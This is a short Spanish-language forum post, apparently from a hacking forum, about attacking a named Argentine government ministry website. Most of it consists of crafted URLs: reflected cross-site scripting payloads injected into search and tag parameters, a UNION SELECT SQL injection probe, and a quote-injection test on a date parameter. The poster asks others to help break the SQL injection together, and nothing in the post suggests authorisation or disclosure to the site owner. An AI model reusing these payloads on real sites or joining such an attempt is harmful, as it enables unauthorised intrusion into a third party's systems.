(http://i46.tinypic.com/34qpyk9.png)
http://www.mincyt.gov.ar/resultados_busqueda.php?cx=012663929835059603360%3A4cqifzdkrgc&cof=FORID%3A10&ie=UTF-8&q=<%2Fdiv><script>alert("HD_Breaker - URS")<%2Fscript><!--
Buscando un sqli encontre otro xss:
http://www.mincyt.gov.ar/busqueda/index.php?Id_modulo=3+union+select+1,2,3,4&Id_idioma=1&Id_tag=136&nombreTag=%3Cscript%3Ealert(%22HD_Breaker%20-%20URS%22)%3C/script%3E
Che no puedo lograr la sqli pero estoy seguro q es vulnerable, si me echan una mano la sacamos entre todos
(http://i48.tinypic.com/25qxlaq.jpg)
http://www.mincyt.gov.ar/agenda/index.php?fecha='2012-03-28